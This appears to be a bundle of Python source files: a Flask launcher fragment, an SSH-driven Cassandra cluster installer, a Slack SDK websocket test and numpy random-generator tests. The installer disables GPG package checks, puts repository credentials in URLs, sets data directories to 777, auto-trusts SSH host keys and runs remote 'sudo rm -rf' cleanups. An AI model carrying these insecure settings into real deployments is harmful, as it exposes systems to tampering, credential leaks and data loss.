def start(self):
"""
Start the flask server in a separate thread and the proxied browser.
"""
flask_thread = Thread(target=self._flask_app.run, args=(self._flask_host, self._flask_port), daemon=True)
flask_thread.start()
self._proxied_browser.run()
def main():
HujiCheese().start()
if __name__ == '__main__':
main()
|
setup_cassandra.py | """
The MIT License (MIT)
Copyright (c) 2016 Datos IO, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import sys
import time
import getpass
import textwrap
import argparse
import paramiko
from IPy import IP
import threading
import multiprocessing
from scp import SCPClient
lock = threading.Lock()
def parse_input():
parser = argparse.ArgumentParser(description='Cassandra Installer.')
parser.add_argument('-u', '--user', default='centos', help='OS user of remote cassandra nodes.')
parser.add_argument('-p', '--password', help='OS user password of remote cassandra nodes.')
parser.add_argument('-k', '--key', help='Os user key to access remote nodes, not required.')
parser.add_argument('-v', '--cass_version', default='2.1.13', help='Cassandra version.')
parser.add_argument('-i', '--cass_ips', default='127.0.0.1', help='File that lists ips of cluster nodes.')
parser.add_argument('-s', '--cass_seeds', help='File that lists ips of seed nodes or comma separated string.')
parser.add_argument('-d', '--cass_data_location', default='/mnt/cassandra/data', help='Location for cassandra data on nodes')
parser.add_argument('-c', '--cass_commitlog_location', default='/mnt/cassandra/commitlog', help='Location for cassandra data on nodes')
parser.add_argument('-n', '--cass_name', default='My_Cluster', help='Name of your cluster.')
parser.add_argument('--num_tokens', default=256, help='Set num vnode tokens per cassandra node.')
parser.add_argument('--clean', action='store_true', help='Purge DB and Commit Log.')
parser.add_argument('--verbose', action='store_true', help='Verbose reporting.')
parser.add_argument('--dse', action='store_true', help='Install Datastax Enterprise version.')
parser.add_argument('--dse_user', default='', help='Datastax Enterprise username.')
parser.add_argument('--dse_pass', default='', help='Datastax Enterprise password.')
parser.add_argument('--cass_auth', action='store_true', help='Add authentication to Cassandra cluster.')
parser.add_argument('--jmx_auth', action='store_true', help='Not implemented yet. Set JMX port.')
parser.add_argument('--jmx_port', default=7199, help='Set JMX port.')
args = parser.parse_args()
if args.dse:
available_versions = ['4.0', '4.0.1', '4.0.2', '4.0.3', '4.0.4', '4.0.5', '4.0.6', '4.0.7',
'4.5', '4.5.1', '4.5.2', '4.5.3', '4.5.4', '4.5.5', '4.5.6', '4.5.7', '4.5.8', '4.5.9',
'4.6', '4.6.1', '4.6.2', '4.6.3', '4.6.4', '4.6.5', '4.6.6', '4.6.7', '4.6.8', '4.6.9', '4.6.10', '4.6.11', '4.6.12',
'4.7', '4.7.1', '4.7.2', '4.7.3', '4.7.4', '4.7.5', '4.7.6', '4.7.7', '4.7.8',
'4.8', '4.8.1', '4.8.2', '4.8.3', '4.8.4', '4.8.5', '4.8.6',
]
else:
available_versions = ['2.0.0', '2.0.9', '2.0.10', '2.0.11', '2.0.12', '2.0.13', '2.0.14', '2.0.15', '2.0.16', '2.0.17',
'2.1.0', '2.1.4', '2.1.5', '2.1.6', '2.1.7', '2.1.8', '2.1.9', '2.1.10', '2.1.11', '2.1.12', '2.1.13',
'2.2.0', '2.2.1', '2.2.2', '2.2.3', '2.2.4', '2.2.5',
# '3.0.0',
# '3.3.0',
# '3.4.0',
]
# So users don't have to put in latest revision, we can handle that and bump to latest.
if args.cass_version == '2.0':
args.cass_version = '2.0.17'
elif args.cass_version == '2.1':
args.cass_version = '2.1.13'
elif args.cass_version == '2.2':
args.cass_version = '2.2.5'
if args.cass_version not in available_versions:
print('%s version not available./nAvailable versions: %s' % (args.cass_version, available_versions))
sys.exit(1)
if args.dse:
if not args.dse_user or not args.dse_pass:
print('Cassandra DSE version requires username and password.')
# Fix @ issue in username for DSE repo. (Platform specific)
if args.dse_user and '@' in args.dse_user:
args.dse_user = args.dse_user.replace('@', '%40')
return args
def parse_ips(cluster_ips):
"""
Consumes ips as a comma separated string or a file with single ips or ip pairs per line and returns list of (pub, priv) ips.
:param cluster_ips comma separated IP string or IP file to be parsed.
:return: [(pub_1, priv_1), (pub_2, priv_2), ..., (pub_n, priv_n)].
example string:
<pub_1>,<pub_2>,...,<pub_n>
<pub_1>,<priv_1>,<pub_2>,<priv_2>,...,<pub_n>,<priv_n>
'10.1.2.3,10.1.2.4,10.1.2.5'
'10.1.2.3,107.1.2.3,10.1.2.4,107.1.2.4'
example IP file:
#########################################################################
# Public Private
10.1.2.3 107.1.2.3 # Most restricted IP (private) always second on line.
10.1.2.4 107.1.2.4
10.1.2.5 # If no public or private IP, only need one IP on line.
#########################################################################
"""
try:
ip_strings = cluster_ips.split(',')
if len(ip_strings) > 1:
ips = []
if ip_strings[0].split('.')[0] != ip_strings[1].split('.')[0]: # Assume if they're different then pub, priv pairs.
curr_ips = []
for ip in ip_strings:
curr_ips.append(ip)
if len(curr_ips) == 2:
ips.append(tuple(curr_ips))
curr_ips = []
if len(curr_ips) > 0:
curr_ips.append(curr_ips[0])
ips.append(tuple(curr_ips))
else:
ips = [(x, x) for x in cluster_ips.split(',')]
IP(ips[0][0]) # Assume if first one is good ip, then argument not passed in as file, but string.
else:
ips = [(x, x) for x in cluster_ips.split(',')]
IP(ips[0][0]) # Assume if first one is good ip, then argument passed in as string.
except ValueError:
with open(cluster_ips, 'r') as f:
lines = f.readlines()
ips = []
for line in lines:
line = line.split('#')[0] # Allow for commenting in file.
line = ' '.join(line.split()).replace('\n', '').strip()
if line != '':
ip_data = line.split()
if len(ip_data) > 1:
pub, priv = ip_data
else:
pub = priv = ip_data[0] # If only 1 ip on line, use for both pub and priv ip.
ips.append((pub, priv))
return ips
def progress_bar(message, event):
"""
Creates a spinner and message on screen. Example: [x] Performing pre-installation check.
:param message: Message to show next to progress bar.
:param event: threading.Event so we can know when to exit progress bar function.
:return: None
"""
i = 0
spinner = ['\\', '/', '-']
lock.acquire() # Serialize progress reporting.
while not event.is_set():
if i % 5 == 0:
j = (i // 5) % 3
bar = '[%s] %s' % (spinner[j], message)
print('\r%s' % bar), ; sys.stdout.flush()
i += 1
time.sleep(0.2)
# Clear the line if status bar was shown.
print('\r[x] %s' % (message))
lock.release()
def rpc(ip, command, user=getpass.getuser(), password=None, key=None, timeout=60*20, retries=1, no_tty=False, suppress_output=False, print_real_time=False):
"""
Remote procedure call.
:param ip:
:param command:
:param user:
:param password:
:param key:
:param timeout:
:param retries:
:param no_tty:
:param suppress_output:
:param print_real_time:
:return: (<str>, <str>)
"""
assert(retries >= 0)
assert(timeout >= 0)
retry_times = [3, 15, 30, 60, 60*5]
for i in xrange(retries + 1):
try:
if not suppress_output:
print('[Try #%s] RPC: {%s} %s' % (i + 1, ip, command))
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=ip, username=user, password=password, key_filename=key, look_for_keys=True, port=22, timeout=timeout)
std_in, out, err = ssh.exec_command(command, get_pty= not no_tty)
out, err = out.read().strip('\n').strip('\r'), err.read().strip('\n').strip('\r')
if 'Connection to %s closed' % ip in err:
err = ''
# Print command and try # if there is an error and we weren't printing information already.
if suppress_output and err:
print('[Try #%s] RPC: {%s} %s' % (i + 1, ip, command))
# Now print output if we are not suppressing it.
if not suppress_output and out:
print(out)
if err:
print(err)
time.sleep(0.5)
ssh.close()
return out, err
except Exception as pe:
print(pe)
if not i > retries:
time.sleep(retry_times[i])
print('Error Connecting.')
return '', 'Error Connecting.'
def scp(mode='put', local_path='.', remote_path='.', ip='127.0.0.1', user=getpass.getuser(), password=None, key=None, recursive=True, timeout=60*60):
"""
:param mode:
:param local_path:
:param remote_path:
:param ip:
:param user:
:param password:
:param key:
:param timeout:
:return: None
"""
assert(timeout >= 0)
assert(mode in ['get', 'put'])
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=ip, username=user, password=password, key_filename=key, look_for_keys=True, port=22, timeout=timeout)
with SCPClient(ssh.get_transport()) as scp:
if mode == 'put':
print('[SCP PUT] %s to <%s>:%s' % (local_path, ip, remote_path))
scp.put(files=local_path, remote_path=remote_path, recursive=recursive)
else:
print("[SCP GET] <%s>:%s to %s" % (ip, remote_path, local_path))
scp.get(local_path=local_path, remote_path=remote_path, recursive=recursive)
ssh.close()
def install(ips, args):
"""
Performs the installation of Cassandra to the whole cluster. Blocking.
:param ips:
:param args:
:return: None
"""
# Start a progress bar if not in verbose mode.
if not args.verbose:
e = threading.Event()
bar_thread = threading.Thread(target=progress_bar, args=('Performing installation.', e))
bar_thread.setDaemon(True)
bar_thread.start()
REPO = "[datastax]\n" \
"name = DataStax Repo for Apache Cassandra\n" \
"baseurl = https://rpm.datastax.com/community\n" \
"enabled = 1\n" \
"gpgcheck = 0"
if args.dse:
REPO = "[datastax]\n" \
"name = DataStax Repo for DataStax Enterprise\n" \
"baseurl=https://%s:%s@rpm.datastax.com/enterprise\n" \
"enabled = 1\n" \
"gpgcheck = 0" % (args.dse_user, args.dse_pass)
def _install_single_node(ip):
def _rpc(cmd):
return rpc(ip, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
major_version = args.cass_version.replace('.', '')[:2]
_rpc('''sudo sh -c "echo '%s' > /etc/yum.repos.d/datastax.repo"''' % REPO)
if args.dse:
_rpc('sudo yum -y install dse-full-%s-1' % (args.cass_version))
else:
_rpc('sudo yum install -y dsc%s-%s-1 cassandra%s-1' % (major_version, args.cass_version, args.cass_version))
if args.clean:
_rpc('sudo rm -rf %s/*' % args.cass_data_location)
_rpc('sudo rm -rf %s/*' % args.cass_commitlog_location)
# Spawn threads to run instructions on all nodes at once
threads = []
for pub, priv in ips:
t = threading.Thread(target=_install_single_node, args=(pub,))
t.setDaemon(True)
t.start()
threads.append(t)
# Wait for all threads to complete
for t in threads:
t.join()
# Terminate the progress bar if not in verbose mode.
if not args.verbose:
e.set()
bar_thread.join()
def do_pre_check(ips, args):
"""
Checks requirements, java, firewalls for all nodes in cluster. Blocking.
:param ips:
:param args:
:return: None
"""
def _port_is_open(host, port, mode='tcp'):
"""
# Utilizing timing attack to determine if port is blocked by firewall, or simply no listener.
:param host:
:param port:
:return:
"""
# cmd = 'echo "knock knock" | nc -w 10 %s %s %s' % ('-u' if mode == 'udp' else '', host, port)
# if args.verbose:
# print(cmd)
#
# start_time = time.time()
# rv = os.system(cmd)
# end_time = time.time()
#
# if rv == 0:
# return True
# if end_time - start_time < 5:
# return True
# return False
return True
def _set_hostname(ip, args):
out, _ = rpc(ip, 'hostname -i', args.user, args.password, args.key, suppress_output=not args.verbose)
if 'Unknown host' in out:
rpc(ip, '''sudo sh -c "echo '`hostname -I` `hostname`' >> /etc/hosts"''', args.user, args.password, args.key, suppress_output=not args.verbose)
def _check_ports(ip):
PORT_LIST = [7000, 7001, 7199, 9160, 9042, 8080]
for port in PORT_LIST:
if not (_port_is_open(ip, port, mode='tcp') and _port_is_open(ip, port, mode='udp')):
print("Check for port %s failed. Make sure that ports %s are open." % (port, PORT_LIST))
sys.exit(1)
def _check_java(ip):
out, _ = rpc(ip, 'which java', args.user, args.password, args.key, suppress_output=not args.verbose)
if 'no java' in out:
rpc(ip, 'sudo yum install -y java-1.7.0-openjdk-devel', args.user, args.password, args.key, suppress_output=not args.verbose)
def _create_directories(ip):
def _rpc(cmd):
return rpc(ip, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
out1, err1 = _rpc('sudo mkdir -p %s' % args.cass_data_location)
out2, err2 = _rpc('sudo mkdir -p %s' % args.cass_commitlog_location)
out3, err3 = _rpc('sudo chmod -R 777 %s' % args.cass_data_location)
out4, err4 = _rpc('sudo chmod -R 777 %s' % args.cass_commitlog_location)
out5, err5 = _rpc('sudo chown -R %s:%s %s' % (args.user, args.user, args.cass_data_location))
out6, err6 = _rpc('sudo chown -R %s:%s %s' % (args.user, args.user, args.cass_commitlog_location))
# Check for errors.
for out in [out1+err1, out2+err2, out3+err3, out4+err4, out5+err5, out6+err6]:
if 'denied' in out or 'cannot' in out:
print("Error creating cassandra directories.\n%s" % out)
sys.exit(1)
def _single_node_pre_check(ip):
_check_ports(ip)
_create_directories(ip)
_set_hostname(ip, args)
_check_java(ip)
# Start a progress bar if not in verbose mode.
if not args.verbose:
e = threading.Event()
bar_thread = threading.Thread(target=progress_bar, args=('Performing pre-installation check.', e))
bar_thread.setDaemon(True)
bar_thread.start()
# Spawn threads to run instructions on all nodes at once
threads = []
for pub, priv in ips:
t = threading.Thread(target=_single_node_pre_check, args=(pub,))
t.setDaemon(True)
t.start()
threads.append(t)
# Wait for all threads to complete
for t in threads:
t.join()
# Terminate the progress bar if not in verbose mode.
if not args.verbose:
e.set()
bar_thread.join()
def do_cleanup(ips, args):
"""
:param ips:
:param args:
:return: None
"""
def _cleanup_single_node(ip):
def _rpc(cmd):
return rpc(ip, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
# TODO: (Make this more targeted)
# Stop services.
_rpc('sudo service cassandra stop')
_rpc('sudo service dsc stop')
_rpc('sudo service dse stop')
_rpc('sudo service datastax-agent stop')
_rpc('sudo /etc/init.d/cassandra stop')
_rpc('sudo /etc/init.d/dsc stop')
_rpc('sudo /etc/init.d/dse stop')
_rpc('sudo /etc/init.d/datastax-agent stop')
# Uninstall packages.
_rpc('sudo yum remove -y \'*cassandra*\' \'*dsc*\' \'*dse*\' \'*datastax*\'')
# Cleanup install folders.
_rpc('sudo rm -rf /var/lib/cassandra/*')
_rpc('sudo rm -rf /var/log/{cassandra,hadoop,hive,pig}/*')
_rpc('sudo rm -rf /etc/{cassandra,dsc,dse}/*')
_rpc('sudo rm -rf /usr/share/{dse,dse-demos}')
_rpc('sudo rm -rf /etc/default/{cassandra,dsc,dse}')
# Start a progress bar if not in verbose mode.
if not args.verbose:
e = threading.Event()
bar_thread = threading.Thread(target=progress_bar, args=('Performing pre-install cleanup.', e))
bar_thread.setDaemon(True)
bar_thread.start()
# Spawn threads to run instructions on all nodes at once
threads = []
for pub, priv in ips:
t = threading.Thread(target=_cleanup_single_node, args=(pub,))
t.setDaemon(True)
t.start()
threads.append(t)
# Wait for all threads to complete
for t in threads:
t.join()
# Terminate the progress bar if not in verbose mode.
if not args.verbose:
e.set()
bar_thread.join()
def set_yaml_configs(ips, seeds, args):
"""
Sets the cassandra.yaml configuration settings on each nodes.
:param ips: List of (<pub>, <priv>) ip tuples of all Cassandra nodes.
:param seeds: List of (<pub>, <priv>) ip tuples of Cassandra seed nodes.
:param args: Argparse arguments.
:return: None
"""
if args.dse:
configs_dir = '/etc/dse/cassandra'
else:
configs_dir = '/etc/cassandra/default.conf'
def _single_node_set_yaml(pub, priv):
def _rpc(cmd):
return rpc(pub, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
# Update seeds.
seeds_orig = 'seeds: "127.0.0.1"'
seeds_new = 'seeds: "%s"' % ','.join([x for x, y in seeds])
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (seeds_orig, seeds_new, configs_dir))
# Update listener.
listener_orig = 'listen_address: localhost'
listener_new = 'listen_address: %s' % priv
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (listener_orig, listener_new, configs_dir))
# Update rpc address.
rpc_orig = 'rpc_address: localhost'
rpc_new = 'rpc_address: %s' % priv
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (rpc_orig, rpc_new, configs_dir))
# Update data location.
data_orig = '/var/lib/cassandra/data'.replace('/', '\\/')
data_new = '%s' % args.cass_data_location.replace('/', '\\/')
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (data_orig, data_new, configs_dir))
# Update commitlog location.
commit_orig = '/var/lib/cassandra/commitlog'.replace('/', '\\/')
commit_new = '%s' % args.cass_commitlog_location.replace('/', '\\/')
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (commit_orig, commit_new, configs_dir))
if args.cass_auth:
auth_orig = 'authenticator: AllowAllAuthenticator'
auth_new = 'authenticator: PasswordAuthenticator'
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (auth_orig, auth_new, configs_dir))
auth_orig = 'authorizer: AllowAllAuthorizer'
auth_new = 'authorizer: CassandraAuthorizer'
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra.yaml" % (auth_orig, auth_new, configs_dir))
# Update JMX port.
jmx_orig = 'JMX_PORT="7199"'
jmx_new = 'JMX_PORT="%s"' % args.jmx_port
_rpc("sudo sed -i 's/%s/%s/g' %s/cassandra-env.sh" % (jmx_orig, jmx_new, configs_dir))
# Start a progress bar if not in verbose mode.
if not args.verbose:
e = threading.Event()
bar_thread = threading.Thread(target=progress_bar, args=('Updating Cassandra settings.', e))
bar_thread.setDaemon(True)
bar_thread.start()
# Spawn threads to run instructions on all nodes at once
threads = []
for pub, priv in ips:
t = threading.Thread(target=_single_node_set_yaml, args=(pub, priv))
t.setDaemon(True)
t.start()
threads.append(t)
# Wait for all threads to complete
for t in threads:
t.join()
# Terminate the progress bar if not in verbose mode.
if not args.verbose:
e.set()
bar_thread.join()
def turn_on(ips, seeds, args):
"""
Turns on the cassandra nodes. Seeds first and then all nodes.
:param ips: All nodes in cluster.
:param seeds: Seed nodes in cluster.
:param args: Argparse arguments.
:return: None
"""
# Spawn threads to run instructions on all nodes at once
def _turn_on_single_node(ip):
if args.dse:
rpc(ip, 'sudo service dse start', args.user, args.password, args.key, suppress_output=not args.verbose)
else:
rpc(ip, 'sudo service cassandra start', args.user, args.password, args.key, suppress_output=not args.verbose)
# Start a progress bar if not in verbose mode.
if not args.verbose:
e = threading.Event()
bar_thread = threading.Thread(target=progress_bar, args=('Starting Cassandra cluster.', e))
bar_thread.setDaemon(True)
bar_thread.start()
threads = []
for pub, priv in seeds:
t = threading.Thread(target=_turn_on_single_node, args=(pub,))
t.setDaemon(True)
t.start()
threads.append(t)
# Wait for all threads to complete
for t in threads:
t.join()
if len(ips) > len(seeds):
time.sleep(40) # Give time for the seed nodes to come up.
# Spawn threads to run instructions on all nodes at once
threads = []
for pub, priv in ips:
if (pub, priv) not in seeds:
t = threading.Thread(target=_turn_on_single_node, args=(pub,))
t.setDaemon(True)
t.start()
threads.append(t)
time.sleep(15) # Slow down startup a bit ... sometimes they get overwhelmed.
# Wait for all threads to complete
for t in threads:
t.join()
# Terminate the progress bar if not in verbose mode.
if not args.verbose:
e.set()
bar_thread.join()
def final_report(seeds, args):
"""
:param seeds:
:param args:
:return: None
"""
# Start a progress bar if not in verbose mode.
if not args.verbose:
e = threading.Event()
bar_thread = threading.Thread(target=progress_bar, args=('Checking status of cluster.', e))
bar_thread.setDaemon(True)
bar_thread.start()
time.sleep(40) # Give time for nodes to come up.
ip = seeds[0][0]
out, err = rpc(ip, 'nodetool status', args.user, args.password, args.key, suppress_output=not args.verbose)
# Terminate the progress bar if not in verbose mode.
if not args.verbose:
e.set()
bar_thread.join()
time.sleep(1) # Allow other progress bar to complete.
print('\n%s' % out)
def print_ip_pairs(ip_list):
"""
Function to standardize printing our (<pub>, <priv>) ip pair tuples.
:param ip_list: List of (<pub>, <priv>) ip pairs.
:return: None
"""
print('%s %s' % ('<Public>'.ljust(15), '<Private>'.ljust(15)))
for pub, priv in ip_list:
print('%s %s' % (pub.ljust(15), priv.ljust(15)))
def do_welcome():
"""
:return: None
"""
title="""
_____ _ _
/ ____| | | | |
| | __ ___ _ __ _ __ ___| |_| |_ ____
| | |_ |/ _ \ '_ \| '_ \ / _ \ __| __/ _ |
| |__| | __/ |_) | |_) | __/ |_| || (_) |
\_____|\___| .__/| .__/ \___|\__|\__\___/
| | | |
|_| |_| The Cloud Maestro
"""
print(title)
def print_license():
license = """THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."""
print('*'*70)
print('%s' % textwrap.fill(license, 70))
print('*'*70)
print('')
def main():
args = parse_input()
ips = parse_ips(args.cass_ips)
do_welcome()
print_license()
# If more than one node use first two as seed nodes.
seeds = parse_ips(args.cass_seeds) if args.cass_seeds else None
if not seeds:
if len(ips) > 2:
seeds = [(ips[0][1], ips[0][1]), (ips[1][1], ips[1][1])]
else:
seeds = [(ips[0][1], ips[0][1]),]
# Print seed and node information.
print('+ Cassandra node IP addresses:')
print_ip_pairs(ips)
print('+ Seed Nodes IP addresses:')
print_ip_pairs(seeds)
print('')
# Do precheck.
do_pre_check(ips, args)
# Do cleanup.
do_cleanup(ips, args)
# Do install.
install(ips, args)
# Set yaml configs.
set_yaml_configs(ips, seeds, args)
# Do turn on.
turn_on(ips, seeds, args)
# Final report
final_report(ips, args)
if __name__ == "__main__":
main()
|
test_interactions_websockets.py | import asyncio
import logging
import time
import unittest
from random import randint
from threading import Thread
from typing import Optional
from slack_sdk.socket_mode.request import SocketModeRequest
from slack_sdk.socket_mode.async_client import AsyncBaseSocketModeClient
from slack_sdk.socket_mode.websockets import SocketModeClient
from slack_sdk.web.async_client import AsyncWebClient
from tests.helpers import is_ci_unstable_test_skip_enabled
from tests.slack_sdk.socket_mode.mock_socket_mode_server import (
start_socket_mode_server,
socket_mode_envelopes,
socket_mode_hello_message,
)
from tests.slack_sdk.socket_mode.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
from tests.slack_sdk_async.helpers import async_test
class TestInteractionsWebsockets(unittest.TestCase):
logger = logging.getLogger(__name__)
def setUp(self):
setup_mock_web_api_server(self)
self.web_client = AsyncWebClient(
token="xoxb-api_test",
base_url="http://localhost:8888",
)
def tearDown(self):
cleanup_mock_web_api_server(self)
@async_test
async def test_interactions(self):
if is_ci_unstable_test_skip_enabled():
return
t = Thread(target=start_socket_mode_server(self, 3002))
t.daemon = True
t.start()
received_messages = []
received_socket_mode_requests = []
async def message_handler(
receiver: AsyncBaseSocketModeClient,
message: dict,
raw_message: Optional[str],
):
self.logger.info(f"Raw Message: {raw_message}")
await asyncio.sleep(randint(50, 200) / 1000)
received_messages.append(raw_message)
async def socket_mode_listener(
receiver: AsyncBaseSocketModeClient,
request: SocketModeRequest,
):
self.logger.info(f"Socket Mode Request: {request}")
await asyncio.sleep(randint(50, 200) / 1000)
received_socket_mode_requests.append(request)
client = SocketModeClient(
app_token="xapp-A111-222-xyz",
web_client=self.web_client,
auto_reconnect_enabled=False,
)
client.message_listeners.append(message_handler)
client.socket_mode_request_listeners.append(socket_mode_listener)
try:
time.sleep(1) # wait for the server
client.wss_uri = "ws://0.0.0.0:3002/link"
await client.connect()
await asyncio.sleep(1) # wait for the message receiver
for _ in range(10):
await client.send_message("foo")
await client.send_message("bar")
await client.send_message("baz")
expected = (
socket_mode_envelopes
+ [socket_mode_hello_message]
+ ["foo", "bar", "baz"] * 10
)
expected.sort()
count = 0
while count < 10 and len(received_messages) < len(expected):
await asyncio.sleep(0.2)
count += 0.2
received_messages.sort()
self.assertEqual(received_messages, expected)
self.assertEqual(
len(socket_mode_envelopes), len(received_socket_mode_requests)
)
finally:
await client.close()
self.server.stop()
self.server.close()
|
test_generator_mt19937.py | import sys
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
